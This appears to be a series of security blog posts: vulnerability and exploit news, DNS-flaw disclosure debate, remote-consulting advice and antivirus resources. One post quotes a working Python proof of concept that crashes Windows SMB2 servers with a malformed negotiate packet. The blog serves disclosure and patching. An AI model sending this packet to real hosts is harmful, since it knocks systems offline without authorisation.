You know, sometimes you just have to laugh as the pain gets to be too much.
From Full Disclosure:
SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB server, and it’s used to identify the SMB dialect that will be used for futher communication.
Oh, but there’s more. Proof of concept anyone?
Yup, got that as well over on FD.
Smb-Bsod.py:
#!/usr/bin/python
# When SMB2.0 recieve a “&” char in the “Process Id High” SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleephost = “IP_ADDR”, 445
buff = (
“\x00\x00\x00\x90″ # Begin SMB header: Session message
“\xff\x53\x4d\x42″ # Server Component: SMB
“\x72\x00\x00\x00″ # Negociate Protocol
“\x00\x18\x53\xc8″ # Operation 0×18 & sub 0xc853
“\x00\x26″# Process ID High: –>normal value should be “\x00\x00″
“\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe”
“\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54″
“\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31″
“\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00″
“\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57″
“\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61″
“\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c”
“\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c”
“\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e”
“\x30\x30\x32\x00″)
s = socket()s.connect(host)
s.send(buff)
s.close()
UPDATE: Here is some more info on this from the site Reverse Mode.
(Image used under CC from ian-s Flickr feed)
One of the most difficult things I have had to deal with in recent years is my transition from a 9 to 5 office to a consultant working from home. While on the surface it may seem like the ideal scenario, and it has its obvious perks, there is a downside.
The isolation is overwhelming at times. Sure I work for a large shop and I’m part of a ‘team’ but, regrettably that is a team in a virtual sense. I almost never see my team members and occasionally converse via email. At no time however does this afford for a team building interaction. After 6 and half years with a medium sized shop it is difficult to be suddenly alone.
This is not to say that I don’t have friends and family to talk with. This is the absence of co-workers. The absence of a team dynamic. Never thought I would say this but, I really do miss that collegial interaction.
I have received some advice from Hoff, myrcurial and others and I thought I would share this with folks who are newly minted (or re-minted) into the consulting space.
- Excercise. No really, this helps to sharpen focus.
- Schedule meetings in person whenever possible.
- Try to have video conferences if geography is a problem. Virtual face time is better than an email.
- Clearly delineate time. If you work from 8 until 4, stick to it. When working from home you run the real risk of eating into your home life.
- Try to maintain contacts with people in you industry. Attend meetings at hackerspaces, 2600, and various security organizations in your community
- Attend conferences. Your company might not spring for it but, there are many cons that are affordable such as Defcon, Shmoocon, Notacon etc.
- Interact online. Twitter is the current hangout and there are groups of like minded folks online. Zach Lanier is marshaling a group of security professionals called Security Twits that is worth checking out.
Now, this by no means an exhaustive list. So, this is where you can help out. What helps/helped you maintain your sanity when faced with the isolation that comes with consulting? Feel free to share your experiences or tips so that other folks can benefit from it.
Thanks!
This problem with Trend Micro was issued yesterday.
From Secunia:
Description:
Elazar Broad has discovered some vulnerabilities in Trend Micro OfficeScan, which can be exploited by malicious people to compromise a user’s system.The vulnerabilities are caused due to boundary errors in the OfficeScan Corp Edition Web-Deployment ObjRemoveCtrl Class ActiveX control (OfficeScanRemoveCtrl.dll) on an OfficeScan client when attempting to display a list of configuration settings. These can be exploited to cause stack-based buffer overflows by passing overly long properties when a user e.g. visits a malicious web site.
Successful exploitation allows execution of arbitrary code, but requires that OfficeScan client was installed using web deployment.
I can only imagine that this same problem exists in Symantec’s antivirus.
The last ditch effort by McKinnon to avoid extradition in the UK has failed. Now, his lawyers are taking the case to the EU courts.
From CNN:
Gary McKinnon, 42, faces charges in the United States for what officials say were a series of cyber attacks that stole passwords, attacked military networks and wrought hundreds of thousands of dollars worth of computer damage.
The decision by Britain’s House of Lords was his last legal option in this country, but his lawyer said she would appeal his case to the European Court of Human Rights in Strasbourg, France.
“The consequences he faces if extradited are both disproportionate and intolerable and we will be making an immediate application to the European court to prevent his removal,” Karen Todner said after McKinnon’s appeal was rejected. “We believe that the British government declined to prosecute him to enable the U.S. government to make an example of him.”
Well, of course they will make an example of him. They have to be sure to please/protect their alien masters.
heh.
So, unless you’ve been hiding under a rock for the last little while you’ll know that Dan Kaminsky broke DNS in a rather big way.
And you’d know that the gory details hit the tubes of the internet a couple days ago.
Hell, there was even a poem about the whole mess. (bless you Hoff)
Now, the DNS ’sploit has been weaponized. HD Moore and company over at Metasploit have released it. For a full write up on it check out our friend, Nate McFeter’s, blog posting on the DNS exploit. Yes, it is being actively exploited.
This storm has of course reignited the inevitable (and tiresome) disclosure debate. Let me save you the trouble and cut right to the chase…
PATCH YOUR FSCKING DNS SERVERS.
Consider yourselves warned…again.
OK, I’m tired talking about this subject. What else is going on in the world?
Tags: DNS Exploit, Exploit Code, DNS Hack, HD Moore, |)ruid, Dan Kaminsky
Well, there was a rumble earlier today when Halvar Flake made it known that he had puzzled out Dan Kaminsky’s DNS vulnerability.
From ADD / XOR / ROL:
I know that Dan asked the public researchers to “not speculate publicly” about the vulnerability, in order to buy people time. This is a commendable goal. I respect Dans viewpoint, but I disagree that this buys anyone time (more on this below). I am fully in agreement with the entire way he handled the vulnerability (e.g. getting the vendors on board, getting the patches made and released, and I understand his decision not to disclose extra information) except the proposed “discussion blackout”.
Next up we saw the good folks over at Matasano jump in with their analysis of the DNS exploit.
From Matasano Chargen:
Pretend for the moment that you know only the basic function of DNS — that it translates WWW.VICTIM.COM into 1.2.3.4. The code that does this is called a resolver. Each time the resolver contacts the DNS to translate names to addresses, it creates a packet called a query. The exchange of packets is called a transaction. Since the number of packets flying about on the internet requires scientific notation to express, you can imagine there has to be some way of not mixing them up.
A rather lengthy explanation ensues and is soon taken offline when Thomas Ptacek realizes that the nature of the post is far too informative.
By then, it was too late. Google had already sunk its teeth in.
Matasano published an apology soon afterward,
We removed it from the blog as soon as we saw it. Unfortunately, it takes only seconds for Internet publications to spread.
We dropped the ball here.
Since alerting the Internet earlier in July about the upcoming announcement of his finding, Dan has consistently urged DNS operators to patch their servers. We confirmed the severity of the problem then and, by inadvertantly verifying another researcher’s results today, reconfirm it today. This is a serious problem, it merits immediate attention, and the extra attention it’s receiving today may increase the threat. The Internet needs to patch this problem ASAP.
Dan Kaminsky jumped on Twitter shortly after 11 pm to confirm the worst.
Get yer patch on people.
Friday morning in NYC and we’re heading for The Last Hope.
Click here to subscribe to Liquidmatrix Security Digest!.
And now, the news…
- Schneier, Team Hack ‘Invisibility Cloak’ for Files | Dark Reading
- HOPE conference highlights everyday hacking | CNET
- Defending against cross-site scripting | Search Security
- Researcher calls out Apple for delaying iPhone patch | Ars Technica
- ‘No decision’ on giant database | BBC News
- Cities Gone Wireless: Safety Or Surveillance? | NPR
- DNSstuff Freeware Detects Vulnerable DNS Servers | eWeek
- Firefox 2 And 3 Get Security Fixes | Information Week
- Man Held In SF City Hacking Case Asks For New Hearing | NBC 11 San Francisco
- Obama Calls for Cyberterror Czar (yet another czar) | Ecommerce Times
Tags: News, Daily Links, Security Blog, Information Security, Security News
OK, sorry for the lack of postings today folks. We’ve been on the road. Myrcurial made his crossing into the US on bus and yours truly flew into Newark.
Gotta love frequent flier miles.
I’m beat but, I’m looking forward to the Last Hope tomorrow. Myrcurial already has his badge and will be posting shortly (if he hasn’t already)
We will be live blogging where possible. Conversely you can follow us on twitter.com @gattaca and @myrcurial
This should be interesting.
Google announced this past summer that they are moving into health care.
From CNN:
Google Inc. will begin storing the medical records of a few thousand people as it tests a long-awaited health service that’s likely to raise more concerns about the volume of sensitive information entrusted to the Internet search leader.
The pilot project to be announced Thursday will involve 1,500 to 10,000 patients at the Cleveland Clinic who volunteered to an electronic transfer of their personal health records so they can be retrieved through Google’s new service, which won’t be open to the general public.
Each health profile, including information about prescriptions, allergies and medical histories, will be protected by a password that’s also required to use other Google services such as e-mail and personalized search tools.
Good thing there is no way to compromise a Gmail account. Phew (in case you might have missed it, that was sarcasm). These problems may or may not still exist. Those links are more for demonstrating that there is a track record established. That notwithstanding, I am a Google fan. So, I’m hopeful that they can do this securely but, on the same token I’d rather that they didn’t have my health records. Not entirely comfortable with that idea to be honest. Third party services do not currently fall under HIPAA.
Tags: Google Health Records, Google Health, Google Data Security
I have a great deal of frustration with some antivirus products as our long term readers might be aware. A couple sites that I have started using (which I should have been using for some time) are Virus Total.com and Jotti.org. These are sites where you can upload suspected malicious software and then have it run through a gamut of virus scanners with the latest signatures. There are others out there but, the point of this is to share it with the readership. The reason behind this is that I have encountered behaviour in come AV products that made me wonder if it was losing its marbles and I want to check against other clients.
For a lot of you the sites are akin to discovering Tuesday. However, folks don’t all start by going to 11. So, if you have other sites that you use feel free to share them. There are also malware search engines that I tend to use such as Offensive Computing. Incidentally, Offensive just received a “bad” rating from McAfee’s SiteAdvisor (if you use that) for which they really can find no issue. After all there is malicious code being researched there.
Anyway, I just thought I’d share those links. Have any you’d like to share?
Tags: Antivirus, Malicious Code,
